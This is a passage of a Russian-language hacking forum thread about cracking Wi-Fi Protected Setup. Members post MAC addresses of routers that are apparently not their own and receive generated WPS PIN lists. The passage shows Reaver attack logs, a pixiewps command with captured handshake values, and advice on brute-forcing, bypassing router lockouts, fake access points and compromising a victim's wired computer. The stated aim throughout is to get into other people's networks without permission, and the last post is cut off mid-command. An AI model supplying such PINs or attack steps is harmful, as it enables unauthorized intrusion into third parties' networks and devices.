PDA

Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20

binarymaster
24.09.2016, 15:26
WPS PIN DIR-825AC

MAC==1C:5F:2B:E4:64:11 ---Последние 8знак - 2BE46411=pin 6388113х

MAC==90:8D:78:C7:1F:B5 ---Последние 8знак - 78C71FB5=pin 6315701x

MAC==48:EE:0C:17:CB6 ---Последние 7знак - C17CBD6 =pin 2886102x

ПРОВЕРЯЕМ http://zalil.su/5165265 (КАРТИНКИ РОУТЕРОВ)

3WiFi WPS PIN-0% !?



Спасибо! Добавил соответствия в WPS PIN Companion (в Router Scan и 3WiFi).

В онлайн-режиме распознаётся только последний, скорее всего в базе таких устройств пока нет. Если обнаружите в физической видимости, просканируйте Router Scan'ом и загрузите в базу.

hunt.lsk
25.09.2016, 05:17
Подскажите пин

00:66:4B:3A:C5:C4

Huawei_HG532e

A0:F3:C1:7E:03:6A

TL-WR741ND

C0:4A:00:B9:8F:04

TL-WR740N

1C:AF:F7:ABF:02

D-Link DIR-320

F4:F2:6D:7F:48:CC

WR720N

henri2002
25.09.2016, 09:59
00:66:4B:3A:C5:C4

Huawei_HG532e



Suggested PIN codes for 00:66:4B:3A:C5:C4

38517167 | 24-bit PIN

34259283 | Static PIN - HG532x



1C:AF:F7:ABF:02

D-Link DIR-320



PIN codes for 1C:AF:F7:ABF:02

12637461 | 24-bit PIN

87042580 | 28-bit PIN

52360985 | 32-bit PIN

97455387 | 36-bit PIN

45128981 | 40-bit PIN

40462103 | 44-bit PIN

00906265 | 48-bit PIN

01883312 | Reverse byte 24-bit

82129835 | Reverse byte 32-bit

60987167 | Reverse byte 48-bit

21621062 | Reverse nibble 24-bit

34992630 | Reverse nibble 32-bit

77641618 | Reverse nibble 48-bit

42587736 | Reverse bits 24-bit

02461274 | Reverse bits 32-bit

02418483 | Reverse bits 48-bit

89789834 | D-Link PIN

99663902 | D-Link PIN +1

56318739 | NETGEAR WNR612v2

16709690 | Vodafone EasyBox

27651407 | ASUS PIN

32845037 | Airocon Realtek

55134699 | Inv NIC to PIN

25274929 | NIC * 2

37912383 | NIC * 3

31438018 | OUI + NIC

73935254 | OUI - NIC

20220051 | OUI ^ NIC

12345670 | Static PIN - Cisco

20172527 | Static PIN - Broadcom 1

46264848 | Static PIN - Broadcom 2

76229909 | Static PIN - Broadcom 3

62327145 | Static PIN - Broadcom 4

68175542 | Static PIN - DSL-2740R

95661469 | Static PIN - Realtek

20854836 | Static PIN - Upvel

43977680 | Static PIN - UR-814AC

05294176 | Static PIN - UR-825AC

99956042 | Static PIN - Onlime

35611530 | Static PIN - Edimax

67958146 | Static PIN - Thomson

34259283 | Static PIN - HG532x

на туполинк известных алгоритмов нет.

stoxx
02.10.2016, 14:37
Всем привет

Не могу получить wps pin по причине того что не идет подбор...бесконечно подбирает pin "12345670" Мне кажется что моя точка имеет какую то защиту...как ее обойти?

binarymaster
02.10.2016, 14:55
Не могу получить wps pin по причине того что не идет подбор...



Без логов ничего не скажешь.

stoxx
02.10.2016, 15:12
root@kali:~# reaver -i wlan0mon -b 90:4D:4A:81:42:4E -P 1 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from 90:4D:4A:81:42:4E

[+] Switching wlan0mon to channel 9

[+] Associated with 90:4D:4A:81:42:4E (ESSID: RT-WiFi_424E)

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+]

Trying pin 12345670.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[P] E-Nonce: 73:d0:fb:57:1d:25:48:28:7a:a4:49:0a:37:b7:6e:6d

[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b

[P] WPS Manufacturer: Realtek Semiconductor Corp.

[P] WPS Model Name: RTL8671

[P] WPS Model Number: EV-2006-07-27

[P] Access Point Serial Number: 123456789012347

[+] Received M1 message

[P] R-Nonce: 59:de:58:8c:9b:3b:44:fb:12:c5:3a:8f:24:77:e5:1e

[P] PKR: 6b:e8:b8:01:28:bb:80:c7:75:90:d0:1e:cc:dc:da:fb:c8 :5e:01:a1:53:33:c0:06:56:e8:18:53:e2:75:fe:48:9e:8 7:74:e7:3b:b0:aa:2c:e2:cc:fd:cc:99:9a:e6:5a:84:b6: 66:7e:3b:3d:7f:72:f9:8c:cf:54:5d:3b:ce:61:02:fb:47 :c8:c0:11:36:8d:21:28:1d:f3:96:3c:a9:a3:aa:ab:4b:7 d:97:02:51:c8:8f:6c:5b:86:28:9c:70:32:92:3a:74:ac: db:81:ac:fa:27:af:b3:08:bf:92:b7:36:cf:99:f2:06:ff :38:f5:b3:6d:7a:90:e3:bb:73:a4:95:db:d6:af:9e:6a:5 7:df:1b:37:80:6b:53:a1:53:3c:e1:a5:c9:a0:2c:89:20: a3:1b:ec:27:39:fc:d1:95:a1:42:0d:51:4f:81:88:88:13 :c9:7c:11:fb:26:0a:7b:2d:9c:02:7b:b7:82:06:aa:22:0 7:12:64:54:bd:15:a2:42:9b

[P] AuthKey: 03:f3:90:87:bc:28:be:d5:06:0d:b0:1b:dd:f6:26:47:77 :2f:57:de:3d:58:77:be:b0:80:f9:7b:7b:02:81:60

[+] Sending M2 message

[+] Received WSC NACK

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x04), re-trying last pin

[+]

Trying pin 12345670.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[P] E-Nonce: 73:f8:79:cd:3e:04:bd:36:29:22:44:09:08:a0:bf:f8

[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b

[P] WPS Manufacturer: Realtek Semiconductor Corp.

[P] WPS Model Name: RTL8671

[P] WPS Model Number: EV-2006-07-27

[P] Access Point Serial Number: 123456789012347

[+] Received M1 message

[P] R-Nonce: c5:80:65:87:72:59:1b:53:ca:ac:f4:f1:06:09:2f:38

[P] PKR: 94:f5:bb:5f:8e:36:92:8f:79:d9:17:2c:66:58:af:c3:94 :51:8a:95:7d:19:b5:3a:ac:da:bd:34:92:86:4c:fc:53:6 2:5c:30:10:fd:fc:79:5c:5a:3f:2e:18:41:e3:e1:91:ad: c1:33:b5:c3:80:a4:a0:88:6f:42:88:ef:a5:9c:76:e0:03 :b9:a2:02:e6:e7:4f:49:30:1e:da:6d:fe:09:e8:c7:85:8 f:c4:73:12:6e:7f:74:d2:32:83:91:27:a1:2a:c7:eb:70: d0:4c:ba:0b:c8:84:47:56:99:a0:e7:ee:a8:ab:32:32:26 :f4:d1:0f:6e:43:72:78:9a:7e:b1:a3:0c:01:94:dd:14:2 9:80:ea:06:2b:9e:57:19:ae:79:63:a7:55:94:58:bb:0f: fb:ed:5e:a7:40:37:e9:c1:dc:06:54:40:84:41:69:18:cd :5b:43:d6:c7:57:da:d1:9d:4f:37:77:b7:18:2d:6a:94:2 0:c2:2c:58:a4:d7:46:54:c8

[P] AuthKey: eb:7d:6c:13:a5:28:0d:23:ab:fe:93:76:79:59:55:b6:fe :56:e2:15:66:c2:a3:cb:76:6b:4f:94:1d:c7:93:f4

[+] Sending M2 message

[+] Received WSC NACK

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x04), re-trying last pin

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[P] E-Nonce: 74:1f:f8:43:5e:e4:32:44:57:a0:3f:07:59:8a:11:82

[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:

TOX1C
02.10.2016, 15:15
WPS Model Name: RTL8671



Расслабляй булки. На этот мерзкий чипсет не может найти подход pixie, и подбор работает далеко не на всех устройствах.

moz9
02.10.2016, 21:00
Ломай без pixie-wps. Чисто полный брут. Вдруг, тебе повезёт и пин окажется простым

tisma
05.10.2016, 10:18
Уважаемые, если есть возможность подскажите пин:

D-Link DIR-320

BSSID: F0-7D-68-75-7D-C5

binarymaster
05.10.2016, 11:49
PIN codes for F0-7D-68-75-7D-C5



1. Такой талмуд надо под спойлер убирать.

2. Большинство пинов в списке вообще никогда не подойдёт к этой модели, зачем их упоминать?

tisma
06.10.2016, 08:35
Что-то ни один не подошел пин для D-Link DIR-320 :-(

carartem02
06.10.2016, 15:41
Что-то ни один не подошел пин для D-Link DIR-320 :-(



Гарантий никогда нет... Например у меня на асусе можно сменить пин код и думаешь тут помогут генераторы? Он предскажет на что я поменял? По личной статистике - падает только ~50% роутеров с wps

Vikhedgehog
09.10.2016, 01:39
Что-то ни один не подошел пин для D-Link DIR-320 :-(



У DIR-320 же вроде локов никогда не было? Можно запустить тупой перебор в ривере. Или я что-то пропустил?

carartem02
09.10.2016, 15:00
У DIR-320 же вроде локов никогда не было? Можно запустить тупой перебор в ривере. Или я что-то пропустил?



Может выпустили все же прошивку с блокировкой?

tisma
12.10.2016, 12:13
Здравствуйте!

Может кто-то сможет подсказать пин к роутеру Zyxel

5C-F4-AB-D2-6D-00

pro100boy
12.10.2016, 12:15
Здравствуйте!

Может кто-то сможет подсказать пин к роутеру Zyxel

5C-F4-AB-D2-6D-00



Пробуй 37904647

rewa
12.10.2016, 22:26
ребята всем привет кто может подсказать bssid f8:32:e4:а8:fc:e8 RT-N18U пин код? буду примного благодарен....

Felis-Sapiens
12.10.2016, 22:41
ребята всем привет кто может подсказать bssid f8:32:e4:а8:fc:e8 RT-N18U



Для RT-18U известных алгоритмов нет.

rewa
12.10.2016, 22:48
Для RT-18U известных алгоритмов нет.



очень жаль...

turboxxx
14.10.2016, 07:10
ребята всем привет кто может подсказать bssid f8:32:e4:а8:fc:e8 RT-N18U пин код? буду примного благодарен....



Попробуй:

10747926

02101200

Brat2
14.10.2016, 10:35
Ericsson казахтелекомовские кто нить пробовал ломать? Сети обычно из 4х символов названия

Заходил в панельку у парочки, у обоих wps mode: pbc(По кнопке как я понял) Их вообще нет смысла пытать пинами?



Привет. Тебе ответили? Бесполезно?

DSL2650NRU
15.10.2016, 15:34
Подскажите пин к ADSL роутеру D-Link DSL-2640U, прошивка с большой вероятностью от ростелекома 2.5.3, BSSID 90:8D:78:B5:35:04? Статичные пины длинка перепробовал. Роутер лочится до перезагрузки после 10 неверных пинов даже если их перебирать с интервалом в час.

farkos
15.10.2016, 18:14
на пробу 76229909

DSL2650NRU
15.10.2016, 18:29
на пробу 76229909



Этот статичный пин, как и 17084215, 46264848, 18576313, 62327145 уже были перепробованы без успеха.

drkrol
17.10.2016, 13:53
ребят, может вы знаете, какой пин подойдет на zyxel keenetic 6699? 1c:74:0d:7e:a5:b8

basil1949
17.10.2016, 14:54
Можно будет попробовать это проверить, но для этого надо будет наблюдать за процессом перебора этой тысячи, сидеть у монитора часа полтора не отвлекаясь ни на секунду, чтобы заметить несколько другую реакцию на один единственный пин (с правильными последними 3 цифрами) в отличие от остальных 999.

А может ли ривер во время работы протоколировать в файл все эти сообщения, что идут на экране во время процесса подбора, чтоб потом не спеша покопаться в файле?



А ведь можно записать процесс перебора пинов в видео и потом потихоньку его просматривать.

basil1949
17.10.2016, 15:28
Wi-Fi роутер ZTE ZXHN H118N. Подскажите, пожалуйста , дефолтные пины.

mac устройства D4-76-EA-20-98-C8

kingdark
18.10.2016, 22:02
Подскажите пин к ADSL роутеру D-Link DSL-2640U, прошивка с большой вероятностью от ростелекома 2.5.3, BSSID 90:8D:78:B5:35:04? Статичные пины длинка перепробовал. Роутер лочится до перезагрузки после 10 неверных пинов даже если их перебирать с интервалом в час.



а у ростелекома ща такие роутеры???обычно они прикалывались с сагемом

DSL2650NRU
18.10.2016, 22:54
а у ростелекома ща такие роутеры???обычно они прикалывались с сагемом



У меня в пределах видимости два таких. Один совсем недавно появился.

resident148
19.10.2016, 02:55
Wi-Fi роутер ZTE ZXHN H118N. Подскажите, пожалуйста , дефолтные пины.

mac устройства D4-76-EA-20-98-C8


у ZTE H118N дефолтный ВПСкод вшит в конфиг и он либо выключен либо 01234567

rewa
19.10.2016, 13:16
Попробуй:

10747926

02101200



не подошли..(

Zayac
19.10.2016, 13:38
На данный момент есть какой-то способ перебирать wps pin к новым tp-link с какими-то мега задержками чтоб после 10 попыток не лочился? чтоб так за несколько месяцев сбрутить...

Kevin Shindel
19.10.2016, 13:40
На данный момент есть какой-то способ перебирать wps pin к новым tp-link с какими-то мега задержками чтоб после 10 попыток не лочился? чтоб так за несколько месяцев сбрутить...



Написать скрипт MDK3+reaver. Но гарантий нет, если роутер не уязвим для МДК то фокус не получится.

Algierd
19.10.2016, 18:56
Новые ZTE h208n идут с wps pbc, соответственно Reaver их не берёт. Есть ли метод "достучаться"?

binarymaster
19.10.2016, 22:31
Новые ZTE h208n идут с wps pbc, соответственно Reaver их не берёт. Есть ли метод "достучаться"?



Если не блокируется, то поставить на вечный перебор пина 00000000.

Авось хозяин кнопочку нажмёт.

Algierd
19.10.2016, 23:22
Если не блокируется, то поставить на вечный перебор пина 00000000.

Авось хозяин кнопочку нажмёт.



Понятно. Метод так себе.

basil1949
20.10.2016, 20:46
А если создать базу всех "правильных" пинов роутеров (от всех, кто их нашел ) и заставить reaver перебирать их вначале ?... А только потом брутфорс...

TOX1C
24.10.2016, 17:44
создать базу всех "правильных" пинов роутеров



Где то на форуме, может даже в этой ветке, предлагали так разламывать лочащиеся тп-линки, просто игнорируя при переборе те диапазоны чисел, которые наблюдались в роутерах с похожим мак-адресом, т.к. у тп-линков сильный разброс по пин-кодам, вроде даже выкладывали в тему список мак-пин. Во время старта проекта 3wifi это предлагали.

DSL2650NRU
24.10.2016, 18:09
Где то на форуме, может даже в этой ветке, предлагали так разламывать лочащиеся тп-линки, просто игнорируя при переборе те диапазоны чисел, которые наблюдались в роутерах с похожим мак-адресом, т.к. у тп-линков сильный разброс по пин-кодам, вроде даже выкладывали в тему список мак-пин. Во время старта проекта 3wifi это предлагали.



Они сейчас лочатся после пяти попыток навсегда. Перезагрузка не помогает. Пока галку не снимешь через вебинтефейс.

TOX1C
24.10.2016, 19:11
Они сейчас лочатся после пяти попыток навсегда.



Это для первых 741 v4 и 841 v8 предлагали, которые без галки были, и давали брутить 10+8 пинов после каждой перезагрузки. Сейчас только fakeap со стандартным ssid-ом точки спасает ситуацию, позволяет узнать стандартный пароль, который и есть WPS пин-кодом.

DSL2650NRU
24.10.2016, 21:07
Это для первых 741 v4 и 841 v8 предлагали, которые без галки были, и давали брутить 10+8 пинов после каждой перезагрузки. Сейчас только fakeap со стандартным ssid-ом точки спасает ситуацию, позволяет узнать стандартный пароль, который и есть WPS пин-кодом.



Да... Производитель защищается. Недавно был прикол - с пикси впс получил пин и тут же ротер просто отключил впс. Не залочил, а отключил - ни вош, ни аиродамп с ключом впс не видели впс. Еще вариант - получил ключ впс, а после подключения по впс роутер меняет имя беспроводной сети и чсх - ключ впа на рандомный хекс и ничего полезного узнать нельзя.

tp-link
26.10.2016, 10:02
Еще вариант - получил ключ впс, а после подключения по впс роутер меняет имя беспроводной сети и чсх - ключ впа на рандомный хекс и ничего полезного узнать нельзя.



точка падает до заводских настроек.

Triton_Mgn
26.10.2016, 10:18
точка падает до заводских настроек.



А это уже уязвимость.

binarymaster
26.10.2016, 11:12
точка падает до заводских настроек.






А это уже уязвимость.



Нет, это просто WPS был не сконфигурирован. Ведь данный протокол позволяет не только получать данные, но и настраивать их.

Когда WPS находится в состоянии "не сконфигурирован", при первом удачном подключении он устанавливает настройки, заданные в специальных полях пакета. Если эти поля не заданы или пустые, настойки генерируются псевдослучайным образом. Но обычно после такого инцидента вполне можно подключиться к точке с новыми созданными данными, и через веб интерфейс узнать старый ключ сети (правда, он там остаётся далеко не всегда).

TOX1C
27.10.2016, 19:50
с пикси впс получил пин и тут же ротер просто отключил впс.



Известная особенность дружбы ривера/бычка с железом ралинк. Этот софт не всегда корректно перебирает. Или заставит точку потушить впс после м2 пакета, или зациклится на нем же.



точка падает до заводских настроек.



Тоже известный прикол у дебилинка 620 на том же ралинке. Вместо пароля дают рандомную строку. И всех тп-линк роутеров. На тп-линке отрабатывает немного иначе - при попытке присосаться по впс к открытой или wep-нутой (что одно и то же) точке, роутер отдаст ssid типа Network_10feeddeface и паролем в виде хекс строки. Пароль у них всегда одинаковый при каждой попытке. С дебилинком 615 е4 так же, только ssid dlink_cdef.

Limonsket
28.10.2016, 01:57
Здравствуйте.

Помогите с пинами к этим сетям:

MGTS_GPON_1682

94:4a:0c:44:88:62

Sercomm RV6688BCM

MGTS_GPON_1798

d4:21:22:33:df:df

Sercomm RV6688BCM

Akado_3FF3

40:3d:ec:37:4f:f8

Humax (модель скорее всего HG100RE-AK)

MGTS_GPON_3312

e0:60:66:51:ef:f8

Sercomm RV6688v2

Akado 20

e0:ce:c3:c7:4e:c0

Askey Computer Corp

Akado E427

40:3d:ec:35:e4:2с

Humax (модель скорее всего HG100RE-AK)

Буду оч признателен, если хотя бы с одним из них поможете.

binarymaster
28.10.2016, 02:09
MGTS_GPON_1682

94:4a:0c:44:88:62

Sercomm RV6688BCM

MGTS_GPON_1798

d4:21:22:33:df:df

Sercomm RV6688BCM

Akado 20

e0:ce:c3:c7:4e:c0

Askey Computer Corp



Попробуй атаку PixieWPS на этих.

Ultimausee
28.10.2016, 23:46
Всем доброго времени суток, есть способ обойти защиту админки роутера запретом на подключение через WLAN?

binarymaster
28.10.2016, 23:58
Всем доброго времени суток, есть способ обойти защиту админки роутера запретом на подключение через WLAN?



Захватить проводного клиента, и после подключаться с него.

Ultimausee
28.10.2016, 23:58
Захватить проводного клиента, и после подключаться с него.



Можно по подробнее?

binarymaster
29.10.2016, 00:21
Можно по подробнее?



Это будет оффтопом здесь.

Вкратце, существует множество способов получить доступ к компьютеру жертвы, в зависимости от ОС, используемых программ, и многого другого. Ищите и найдёте.

Limonsket
29.10.2016, 03:03
Попробуй атаку PixieWPS на этих.



А других методов нет?

Как я понял, то PixieWPS это на линуксе? А есть что то на андроиде?

Ultimausee
29.10.2016, 08:39
А других методов нет?

Как я понял, то PixieWPS это на линуксе? А есть что то на андроиде?



На ведре мало программ подобного рода. Есть androdumpper, например, но он работает со стоковыми пинами роутеров, если у роутера не сток - этот метод не поможет. Там, конечно, есть Брут, как в ривере, но толку то от него. Ещё есть. Wibr+, это перебор по словарю без хендов, он тупо пытается подключиться к точке с паролями из словаря. Его минус в том, что он очень медленный, где-то 10 паролей в минуту. Зато, есть шанс, что хозяин роутера использовал простой пароль, который есть в словаре.

SteganoS888
30.10.2016, 17:51
EC:43:F6:03:E3:44 ребята помогите с пином ктонибудь...заранее благодарен

VladimirV
30.10.2016, 18:00
EC:43:F6:03:E3:44 ребята помогите с пином ктонибудь...заранее благодарен



02547886

За этим регистрировались?

SteganoS888
30.10.2016, 18:09
02547886

За этим регистрировались?


Да пробовал, увы нет(

CRACK211
30.10.2016, 18:17
Да пробовал, увы нет(



Pixie wps вам в помощь.) это старый добрый zyxcel ) он податливый ))) без отказный )

SteganoS888
30.10.2016, 18:24
Pixie wps вам в помощь.) это старый добрый zyxcel ) он податливый ))) без отказный )



В данный момент, имею в распоряжении лишь телефон с WPS WPA Tester и острую необходимость в Wi Fi. Нахожусь в командировке.WPS WPA Tester со стандартными ПИНами не помогает

CRACK211
30.10.2016, 18:38
А что за телефон?



В данный момент, имею в распоряжении лишь телефон с WPS WPA Tester и острую необходимость в Wi Fi. Нахожусь в командировке.WPS WPA Tester со стандартными ПИНами не помогает

SteganoS888
30.10.2016, 18:40
А что за телефон?



Sony z3 android + root

CRACK211
30.10.2016, 18:51
Sony z3 android + root



http://4pda.ru/forum/index.php?showtopic=652685 Попробуйте установить если заработает то вам повезло. Можно pixiewps и aircrack для ловли хендшека использовать )

SteganoS888
30.10.2016, 19:10
http://4pda.ru/forum/index.php?showtopic=652685 Попробуйте установить если заработает то вам повезло. Можно pixiewps и aircrack для ловли хендшека использовать )



Не завёлся на моём устройстве...боюсь возможности android на данный момент исчерпаны. Спасибо за помошь в любом случае!

Limonsket
31.10.2016, 00:29
Может хоть с этим роутером поможете

Asus RT-N12VP

38:d5:47:43:69:44

muslim909090
31.10.2016, 00:53
Тоже интересует !



привет . ты не нашел способ обхода блокировки wps

muslim909090
31.10.2016, 00:56
помогиитеее .WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

VladimirV
31.10.2016, 01:02
Может хоть с этим роутером поможете

Asus RT-N12VP

38:d5:47:43:69:44



Если Вы про пин, то вот - 01475449

muslim909090
31.10.2016, 01:09
Если Вы про пин, то вот - 01475449



WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking я про это БРО

многое попробовал но все равно не че не получаеться .не знаегш че можно сделать?

Andrey9999
31.10.2016, 01:18
Это из генератора WPS PIN - для ASUS'ов



WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking



с этим бороться бесполезно

muslim909090
31.10.2016, 01:21
Это из генератора WPS PIN - для ASUS'ов

с этим бороться бесполезно



уверен.должен же быть метод

Andrey9999
31.10.2016, 01:47
уверен.должен же быть метод



Попробуй лучше хендшейк поймать и сюда выложить

SteganoS888
31.10.2016, 04:16
Может хоть с этим роутером поможете

Asus RT-N12VP

38:d5:47:43:69:44



Попробуйте 01475449

yx-ex
31.10.2016, 11:13
Не подкармливайте страждущих пинов по макам!Блин,смотрю-новые посты в этой теме,захожу почитать(может что новое),а тут-Дайте пин на тот,дайте пин на этот.Смотрю-есть новые посты в этой теме https://forum.antichat.ru/threads/400848/page-7 .Захожу,ну и что я вместо новых постов вижу?Правильно!-дайте пин на то,дайте пин на это.Обе темы превратились в инструмент по получению пинов,читать нечего,одни маки и просьбы сделать то,что сами просящие в состоянии сделать что в базе 3wifi,что в калькуляторах,да где угодно(да еще и по 8 штук сразу запрашивают).

yx-ex
31.10.2016, 11:15
уверен.должен же быть метод



Обманула вас ваша увереность.А чтобы узнать почему,и что возможно сделать иногда с таким-форум почитайте.А то так и будете сидеть,в уверености,но без пинов и паролей.

CRACK211
31.10.2016, 12:40
Не подкармливайте страждущих пинов по макам!Блин,смотрю-новые посты в этой теме,захожу почитать(может что новое),а тут-Дайте пин на тот,дайте пин на этот.Смотрю-есть новые посты в этой теме https://forum.antichat.ru/threads/400848/page-7 .Захожу,ну и что я вместо новых постов вижу?Правильно!-дайте пин на то,дайте пин на это.Обе темы превратились в инструмент по получению пинов,читать нечего,одни маки и просьбы сделать то,что сами просящие в состоянии сделать что в базе 3wifi,что в калькуляторах,да где угодно(да еще и по 8 штук сразу запрашивают).



Я в своё время открывал такую тему чтобы не засорять эту ветку. Но она не пользовалась успехом и забылась. Если старожилы поддержат тему то эта тема подчиститься )

https://forum.antichat.ru/threads/432760/

edr12n
02.11.2016, 04:01
Доброй ночи, друзья

Пытался пробить и найти PIN сам, через DUMPER пытался зайти, но выдает мне вот такое

http://i.imgur.com/3M7DNQ6.png

Не могу понять, у меня неправильный PIN или это сам роутер отклоняет попытку залезть в него?

PIN искал сам DUMPER, пытался набирать все доступные PINы на 3wifi, через https://tools.securation.com/wdpg/ тоже пытался, но все тщетно...

Есть какие либо идеи?

Еще вот такая вещь, иногда при попытке ввода пароля от wifi, выскакивает такое вот http://blob:http://imgur.com/48805b04-2fe1-43a9-9196-66cb9364fa57 http://i.imgur.com/Q0LzWcZ.png

Я так понимаю,что если подобрать PIN, то и никакие фичи не нужны?? Помогите, друзья!!!

P.S. Bssid D4:21:22:48:FF:F9

SERCOMM RV6688BCM

P.S.S. Видел в этой же теме, странице на 97 пароли к wifi у такого роутера, но ничего не помогло

binarymaster
02.11.2016, 11:17
Не могу понять, у меня неправильный PIN или это сам роутер отклоняет попытку залезть в него?


"Setup Locked", написано же.



P.S. Bssid D4:21:22:48:FF:F9

SERCOMM RV6688BCM



Алгоритма нет. Но уязвим к атаке PixieWPS.

Ushmozz
04.11.2016, 04:32
Привет помогите пожалуйста! 00:1F:CE:68:F8:F4 QTECH Rouer никак не могу подобрать WPS PIN

Mednik
04.11.2016, 09:27
Привет помогите пожалуйста! 00:1F:CE:68:F8:F4 QTECH Rouer никак не могу подобрать WPS PIN



Вам сюда https://forum.antichat.ru/threads/432760/

DSL2650NRU
04.11.2016, 13:55
Привет помогите пожалуйста! 00:1F:CE:68:F8:F4 QTECH Rouer никак не могу подобрать WPS PIN



PixieWPS пробовали? Мне помогло с QTECH с таким же OUI добыть пин. Но не более того https://forum.antichat.ru/posts/4005458/

Kevin Shindel
05.11.2016, 00:00
Ребята подскажите где проскакивала инфа как узнать есть ли фильтр по маку или нет...

Есть пасс от точки пытаюсь зайти но не пускает, но и не пишет что пароль не верный...

Как узнать стоит фильтр по маку или просто ТД заглючила...

Спасибо.

djamv
05.11.2016, 01:08
Ребята подскажите где проскакивала инфа как узнать есть ли фильтр по маку или нет...



besside-ng -b МАК_точки monX

Оно поймает рукопожатие и, если есть фильтр по маку, запишет разрешенный мак в лог.

roman921
08.11.2016, 02:58
А tp841n реально перезагрузить ? Ривером ломал, но он залочился после 10 попыток где-то. Делаю атаки с мдк3 разные вместе, но не перезагружается.

atlas28
09.11.2016, 22:15
Практически всегда на кинетиках со включенным WPS получалось применить pixiewps атаку, но тут наткнулся на один такой, на котором не находит пин. Уязвимость пофиксили?


pixiewps -e 08:5b:3d:a7:0c:b6:62:31:81:8c:da:24:a8:15:08:1c:a9 :7e:9c:23:aa:2e:34:38:1f:db:33:81:f4:ba:78:b6:fa:d 1:4d:0a:4a:67:b6:b5:f0:97:86:46:29:a8:2a:e7:11:d5: 18:dd:aa:88:e2:6b:f0:70:f9:6f:2e:64:58:59:3b:d7:8d :40:2b:61:c6:cf:e4:5c:4e:73:a1:b9:37:13:7f:82:c3:b 0:7d:f4:da:37:5d:71:21:32:35:ee:4c:07:9a:cd:81:90: 5b:c8:d4:e5:14:89:21:c2:86:bd:b2:10:57:8b:53:0c:5d :cf:e1:9b:3e:7b:56:59:e0:dc:98:f9:53:8e:9f:6a:5a:c e:37:34:a0:02:3a:e2:73:22:61:41:44:d4:e9:4f:be:52: 68:75:6a:cb:a5:d8:3e:79:67:c3:09:8c:66:bc:81:d9:a8 :6a:fb:72:df:0e:12:08:28:48:78:c5:3d:79:44:b6:03:8 5:72:80:aa:ba:72:61:be:17 -r c1:37:b0:8c:ca:18:95:10:e3:bd:22:2f:94:a4:5e:d9:6e :1b:ba:a9:74:9a:0d:13:54:2a:95:1d:5e:c3:ae:a6:d8:1 7:91:90:98:e8:21:44:88:a3:f3:9a:c6:10:08:5c:98:26: 2f:0a:23:dc:9f:05:28:ba:fe:9f:22:e9:54:9f:a2:78:53 :0e:80:ff:c5:37:5e:41:54:ed:60:97:fc:9d:5a:20:21:c 1:17:2d:6a:4e:fe:50:8f:f0:9c:97:0e:f1:96:ab:98:38: 0c:e1:f0:7a:d6:af:09:e8:10:7d:9a:f5:72:ad:e1:7d:c7 :34:13:2f:0f:c8:84:36:11:73:67:12:98:e2:90:3c:f9:d 9:98:44:01:f2:0f:ac:9b:af:8b:b2:62:ad:c1:ff:f8:09: 2a:ef:03:5a:75:fc:0f:d2:23:06:00:17:6c:54:79:a6:51 :ec:d5:68:b8:5f:af:6e:29:d6:e9:6c:b0:79:b0:bf:1b:f 6:dc:5a:31:76:bb:fd:f4:35 -s 1c:ea:b3:b1:66:39:68:c8:45:d4:dd:c0:6a:11:c8:49:09 :32:59:3a:8a:25:28:a5:7c:0a:20:15:60:14:fd:79 -z be:39:52:82:53:75:10:16:1f:69:77:27:37:ed:02:49:a7 :0d:ed:cc:9b:5d:40:7e:36:8c:3d:1a:84:5b:3e:82 -a 